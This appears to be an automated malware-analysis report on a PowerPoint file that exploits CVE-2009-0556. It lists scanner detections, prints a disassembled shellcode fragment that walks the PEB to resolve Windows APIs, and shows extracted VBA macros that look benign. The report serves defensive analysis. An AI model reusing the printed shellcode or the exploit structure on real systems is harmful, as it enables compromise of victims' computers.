MALICIOUS
228
Risk Score
Heuristics 6
-
CVE-2009-0556 — PowerPoint malformed ClientTextbox critical CVE exact CVE_2009_0556The PowerPoint record graph contains an Escher ClientTextbox with both OutlineTextRefAtom and TextHeaderAtom children. This is the OffVis-compatible structural condition for the PowerPoint memory corruption vulnerability fixed in MS09-017.
-
ClamAV: Ppt.Exploit.Apptom-10029459-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Ppt.Exploit.Apptom-10029459-0
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
x86 disassembly · validity: code (0.83) — 5/6 branch targets land on an instruction boundary (83% coherence)00000A05 64a130000000 mov eax, dword ptr fs:[0x30] 00000A0B 8b400c mov eax, dword ptr [eax + 0xc] 00000A0E 8b701c mov esi, dword ptr [eax + 0x1c] 00000A11 ad lodsd eax, dword ptr [esi] 00000A12 8b7808 mov edi, dword ptr [eax + 8] 00000A15 8b473c mov eax, dword ptr [edi + 0x3c] 00000A18 8b543878 mov edx, dword ptr [eax + edi + 0x78] 00000A1C 03d7 add edx, edi 00000A1E 8b5a20 mov ebx, dword ptr [edx + 0x20] 00000A21 03df add ebx, edi 00000A23 33c9 xor ecx, ecx 00000A25 41 inc ecx 00000A26 8b348b mov esi, dword ptr [ebx + ecx*4] 00000A29 03f7 add esi, edi 00000A2B b849734261 mov eax, 0x61427349 00000A30 3b06 cmp eax, dword ptr [esi] 00000A32 75f1 jne 0xa25 00000A34 b864577269 mov eax, 0x69725764 00000A39 3b4604 cmp eax, dword ptr [esi + 4] 00000A3C 75e7 jne 0xa25 00000A3E 8b5a24 mov ebx, dword ptr [edx + 0x24] 00000A41 03df add ebx, edi 00000A43 668b0c4b mov cx, word ptr [ebx + ecx*2] 00000A47 8b5a1c mov ebx, dword ptr [edx + 0x1c] 00000A4A 03df add ebx, edi 00000A4C 8b048b mov eax, dword ptr [ebx + ecx*4] 00000A4F 03c7 add eax, edi 00000A51 bf00000030 mov edi, 0x30000000 00000A56 8bd8 mov ebx, eax 00000A58 81c700100000 add edi, 0x1000 00000A5E 6800040000 push 0x400 00000A63 57 push edi 00000A64 ff .byte 0xff
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set xlApp = CreateObject("Excel.Application") -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1005 bytes |
SHA-256: 7403e4728955600b20e1b11715dae9328df16f95bc7db40bf64d8dfe55835d1d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub AutoOpen()
'Parametre [Fichier PPT] [Nom de la macro]
c = Command()
cl = InStr(c, " ")
c1 = Left(c, cl - 1)
c2 = Right(c, Len(c) - cl)
Dim a As New PowerPoint.Application
a.WindowState = ppWindowMaximized
a.Visible = True
a.Presentations.Open c1
a.Run (c1 & "!" & c2)
Set a = Nothing
End Sub
Dim xlApp As excel.Application
Dim xlBook As excel.workbook
Sub test()
'lancer le fichier excel
Set xlApp = CreateObject("Excel.Application")
Set xlBook = xlApp.workbooks.Open("chemin_du_fichier.xls")
xlApp.Visible = True
End Sub
Sub valid()
'lancer valider de excel
xlApp.Run "feuil2.valider"
End Sub
Attribute VB_Name = "Classe1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.